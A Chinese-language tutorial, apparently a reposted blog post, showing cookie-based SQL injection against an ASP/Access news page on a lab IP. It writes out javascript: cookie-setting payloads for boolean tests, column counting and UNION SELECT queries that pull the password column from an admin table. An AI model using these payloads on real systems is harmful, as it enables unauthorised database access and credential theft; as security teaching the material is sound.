Cookie注入
以ACCESS資料庫為例;其他資料庫用相應的注入陳述句就可以
Cookie注入的目的
主要是為了繞程序式員在get、post等傳參處做的一些過濾,
如何Cookie注入
判斷是否可以在 Cookie 處注入
目標站點:
192.168.74.136:8009/shownews.asp?id=26
在進行get注入時發現過濾關鍵字,嘗試Cookie注入
- 重繪需要注入的當前網頁,清空地址欄并輸入
javascript:alert(document.cookie="id="+escape("27"));
-
點擊回車,發現彈窗如下:
-
點擊頁面上出現的確定框,
-
驗證是否改好了cookie:
現在更改好了cookie后我們就要試下能不能正常訪問了,現在在另外一個視窗中我們打開以下地址:
http://192.168.74.136:8009/shownews.asp?
既是將“id=27”去掉后的URL,然后看是否能正常訪問,
-
可見訪問之后的頁面與訪問
http://192.168.74.136:8009/shownews.asp?id=27的時候是一樣的,這樣就說明程式在使用request物件獲取資料的時候并未指明具體使用什么方法來獲取,而是直接使用request("xx")的方式,現在說明cookie處是有可能存在注入的,接下來我們測驗下能否提交特殊字符,看程式是否對資料進行過濾,
判斷是否存在過濾
回到剛才更改cookie的頁面,然后在地址欄處填寫
javascript:alert(document.cookie="id="+escape("27 and 1=1"));
回車后再去http://192.168.74.136:8009/shownews.asp?頁面重繪,看頁面是否正常,
如果正常我們再提交
javascript:alert(document.cookie="id="+escape("27 and 1=2"));
然后再去重繪,這個時候就會看見出錯了,說明可以注入,且不存在過濾,
獲取欄位總數
javascript:alert(document.cookie="id="+escape("27 order by 1"));
重繪 http://192.168.74.136:8009/shownews.asp? 界面 ,回傳正常
javascript:alert(document.cookie="id="+escape("27 order by 11"));
重繪 http://192.168.74.136:8009/shownews.asp? 界面 ,回傳正常
javascript:alert(document.cookie="id="+escape("27 order by 12"));
重繪 http://192.168.74.136:8009/shownews.asp? 界面 ,回傳錯誤
說明欄位數是 11
猜解表名
javascript:alert(document.cookie="id="+escape("27 union select 1,2,3,4,5,6,7,8,9,10,11 from 表名"));
javascript:alert(document.cookie="id="+escape("27 union select 1,2,3,4,5,6,7,8,9,10,11 from admin"));
猜解列名
javascript:alert(document.cookie="id="+escape("27 union select 1,列名,3,4,5,6,7,8,9,10,11 from 表名"));
javascript:alert(document.cookie="id="+escape("27 union select 1,password,3,4,5,6,7,8,9,10,11 from admin"));
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/27480.html
標籤:其他
上一篇:初始化prefab的問題